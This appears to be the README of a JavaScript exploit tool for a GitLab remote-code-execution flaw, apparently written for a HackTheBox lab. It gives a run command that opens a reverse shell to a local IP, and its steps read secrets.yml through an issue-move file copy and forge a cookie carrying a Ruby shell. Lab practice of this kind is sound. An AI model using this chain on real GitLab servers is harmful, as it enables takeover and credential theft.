Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me, and the HTML parsing stuff seemed cumbersome, so I rewrote it in JS.
Start a reverse shell handler in the usual way, then run this script with:
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
node gitlab_rce.js
A proxy may be specified with TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080".
Burp is particularly useful for debugging with this.
1. Check that the target is up.
2. If the provided user exists, skip to step 5.
3. Scan for a username that doesn't already exist.
4. Create that user.
5. Attempt sign-in.
6. Create two empty projects.
7. Create a new issue ticket in the first project with a malicious link in its body.
8. Move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads directory.
9. Fetch the target file; in this case we want secrets.yml for the secret_key_base.
10. Use secret_key_base to mint an evil cookie carrying our Ruby shell and pass it to GitLab.